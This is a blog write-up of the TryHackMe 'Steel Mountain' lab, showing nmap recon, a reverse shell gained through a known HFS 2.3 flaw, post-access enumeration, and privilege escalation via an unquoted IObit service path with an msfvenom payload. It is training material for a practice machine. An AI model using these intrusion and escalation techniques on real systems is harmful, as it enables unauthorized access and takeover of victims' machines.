Hello there and welcome to my first ever write-up.
Recently I’ve been spending a lot of time on TryHackMe; it’s a really addictive platform for studying and practising your hacking skills at the same time. Instead of posting commands and theories, I’ve decided to do write-ups, as it provides much more value. So let’s get started. Here’s a link to the box.
Steel Mountain is a Windows themed machine from TryHackMe, based on the Mr Robot Tv series (my all-time favourite show). The official walkthrough is provided with Metasploit, which makes it pretty easy to root. However, we’ll be doing it all manually today, because you’re not able to use auto-exploit tools on the OSCP exam.
This makes you understand how it all works behind the scenes, so when you get stuck with scripts doing it all automatically, you can fall back to the manual way of things. I’ve kept the methodology simple to Enumeration, Exploitation & Privilege Escalation.
Enumeration
Running a Nmap scan:
┌──(kali㉿kali)-[~]
└─$ export IP=10.10.212.213
┌──(kali㉿kali)-[~]
└─$ nmap -A -Pn -v $IP
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-10-11T19:04:29
| Not valid after: 2021-04-12T19:04:29
| MD5: cf4c 483f 7654 c778 e6b9 0144 1de0 18c9
|_SHA-1: ed4f 6cac 8059 d465 9e7b 7730 8ac4 56a4 67df d29c
|_ssl-date: 2021-02-05T15:22:17+00:00; -1s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: , NetBIOS MAC: 02:d5:4c:6e:e4:ef (unknown)
| Names:
| STEELMOUNTAIN Flags:
| WORKGROUP Flags:
|_ STEELMOUNTAIN Flags:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-05T15:22:11
|_ start_date: 2021-02-05T14:09:29
I like including the -v flag for verbosity, as the scan continues and gives me some results, I’m able to probe around to see for anything interesting. On port 80 we find a Microsoft web server that contains a random picture of someone from the Mr Robot series.
Running dirbuster doesn’t give us anything interesting.
When we explore the web server on port 8080, we find a http file server running on version 2.3, left below we see “Server Information” that contains a link to the vendor’s website:
Exploitation
Let’s search if this version of the webserver is vulnerable:
Copy the exploit to a local path & check its usage. After reading through, we need a reverse shell payload, I’ll use Powershell, as I haven’t tested it much. Check below for the code & make sure you change the IP & port values with your own.
After configuring the payload, it’s time to start our Netcat listener (need to sudo if the port is and below 1023) and our HTTP server to download & run the reverse shell binary on the target.
We’re in now, which means it’s time for some more enumeration, we need to find weak points and identify vulnerable configurations. I always start by finding who I am and what my privileges are.
whoami
listening on [any] 443 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.212.213] 50067
PS C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>whoami
steelmountain\bill
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Bypass traverse checking means that we can only view certain files in certain folders without being able to list their contents, we’re only able to “traverse” to the file to which we have access set previously by the admin or system.
Other (hidden) users
Let’s view the other existing users in the system, the -Force command lets us see the hidden files too:
PS C:\Users\bill\Desktop> net users
User accounts for \\STEELMOUNTAIN
-------------------------------------------------------------------------------
Administrator bill Guest
The command completed successfully.
PS C:\Users\bill\Downloads> Get-ChildItem C:\Users -Force | select Name
Name
----
Administrator
All Users
bill
Default
Default User
Public
desktop.ini
Any users in the Administrators group
We don’t find any of the users in the Administrators group.
PS C:\Users\bill\Downloads> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
Although we have an open RDP port (3389), I couldn’t connect, not sure why.
Tip: HKLM keys are run (if required) every time the system is booted while HKCU keys are only executed when a specific user logs on to the system.
Check for weak folder permissions
We’ll find all weak folder permissions per drive with accesschk.exe downloaded from the official Microsoft website. You can use your apache server or an smb-server to transfer it. (took me ~1 min, be patient)
The IObit software gets my attention immediately, because it’s unusual (after seeing some defaults, you’ll get used to it). Searching again for weak file permissions with “.\accesschk.exe -uwqs Users c:\“. gives me the same results.
This one-liner returns the process owner without admin rights, if something is blank under owner it’s probably running as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.
PS C:\Users\bill\Downloads> Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
Name Handle Owner
---- ------ -----
System Idle Process 0
System 4
smss.exe 360
csrss.exe 492
csrss.exe 544
wininit.exe 572
winlogon.exe 580
services.exe 640
lsass.exe 648
ASCService.exe 824
dwm.exe 836
spoolsv.exe 1208
amazon-ssm-agent.exe 1252
LiteAgent.exe 1324
LiveUpdate.exe 1452
Ec2Config.exe 1664
WmiPrvSE.exe 2368
taskhostex.exe 2628 bill
explorer.exe 2692 bill
hfs.exe 2504 bill
msdtc.exe 3488
powershell.exe 3636 bill
powershell.exe 3660 bill
conhost.exe 3668 bill
conhost.exe 3692 bill
Query the service
We saw AdvancedSystemCareService almost on every check, let’s query the service to check out its config:
PS C:\Users\bill\Downloads> cmd.exe /c 'sc qc AdvancedSystemCareService9'
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AdvancedSystemCareService9
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 1
DISPLAY_NAME : Advanced SystemCare Service 9
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
The binary path name is unquoted and it contains spaces. So windows will first try to run Advanced.exe before the actual executable. Therefor we need to place our payload into C:\Program Files (x86)\IObit\ & rename it to Advanced.exe. Afterwards restart the service, because it’s currently running as seen above. We also confirmed we have read & write (RW) access to the folder above with accesschk.exe.
Let’s create our second reverse shell payload using msfvenom, name it Advanced.exe, transfer to the target machine using certutil.exe and start a listener on the specified port. Stop the service, make sure it’s stopped with Get-Service & start it again:
We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept”, you consent to the use of ALL the cookies.
This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.
Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.
Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.
0 Comments